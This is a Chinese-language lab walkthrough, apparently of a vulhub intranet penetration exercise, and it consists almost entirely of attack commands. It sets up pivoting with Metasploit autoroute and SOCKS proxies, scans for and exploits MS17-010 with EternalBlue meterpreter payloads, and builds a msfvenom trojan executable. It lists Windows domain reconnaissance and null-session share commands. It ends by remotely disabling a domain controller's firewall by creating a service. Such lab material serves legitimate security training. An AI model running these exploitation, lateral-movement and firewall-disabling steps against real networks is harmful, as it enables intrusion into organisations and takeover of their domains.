cd /home/ubuntu/Desktop/vulhub/struts2/s2-045 docker-compose up -d cd /home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615/ docker-compose up -d cd /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613/ docker-compose up -d
这次终于是主机上线了 然后就是正常的步骤做就行了 run get_local_subnet arp -a 扫到183网段 设路由 run autoroute -s 192.168.183.0/24 run autoroute -p background
1 2 3 4 5 6 7 8 9 10 11 12 13 14
做存活扫描 use auxiliary/scanner/discovery/udp_probe set rhosts 192.168.183.0-255 set threads 5 run 也可以用smb扫 use auxiliary/scanner/smb/smb_version set rhosts 192.168.183.0/24 set threads 5 run 扫永恒之蓝 use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.183.129-130 run
msf里 setg Proxies socks5:192.168.31.127:1080 ms17_010 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set rhost 192.168.183.129 set lport 4444 set AutoRunScript post/windows/manage/migrate 自动进程迁移
ipconfig /all # 查看本机ip,所在域 route print# 打印路由信息 net view # 查看局域网内其他主机名 arp -a # 查看arp缓存 net start # 查看开启了哪些服务 net share # 查看开启了哪些共享 net share ipc$ # 开启ipc共享 net share c$ # 开启c盘共享 net use \\192.168.xx.xx\ipc$ "" /user:""# 与192.168.xx.xx建立空连接 net use \\192.168.xx.xx\c$ "密码" /user:"用户名"# 建立c盘共享 dir \\192.168.xx.xx\c$\user # 查看192.168.xx.xx c盘user目录下的文件
net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net user # 查看本机用户列表 net user /domain # 查看域用户 net localgroup administrators # 查看本地管理员组(通常会有域用户) net view /domain # 查看有几个域 net user 用户名 /domain # 获取指定域用户的信息 net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作) net group 组名 /domain # 查看域中某工作组 net time /domain // 主域服务器会同时作为时间服务器 net group "domain admins" /domain # 查看域管理员的名字 net group "domain computers" /domain # 查看域中的其他主机名 net group "doamin controllers" /domain # 查看域控制器(可能有多台) net group "Enterprise Admins" /domain // 查看域管理员组
生成一个msf马 msfvenom -p windows/meterpreter/bind_tcp lhost=192.168.31.96 lport=6688 -f exe -o dd.exe 监听 use exploit/multi/handler set Proxies socks5:192.168.135.4:1080 set payload windows/meterpreter/bind_tcp set rhost 192.168.183.130 set lport 6688 set AutoRunScript post/windows/manage/migrate run
1 2 3 4 5 6 7 8 9 10 11 12
查看域控 net use \\WIN-ENS2VR5TR3N dir \\WIN-ENS2VR5TR3N\c$
关防火墙 sc \\WIN-ENS2VR5TR3N create unablefirewall binpath= "netsh advfirewall set allprofiles state off" sc \\WIN-ENS2VR5TR3N start unablefirewall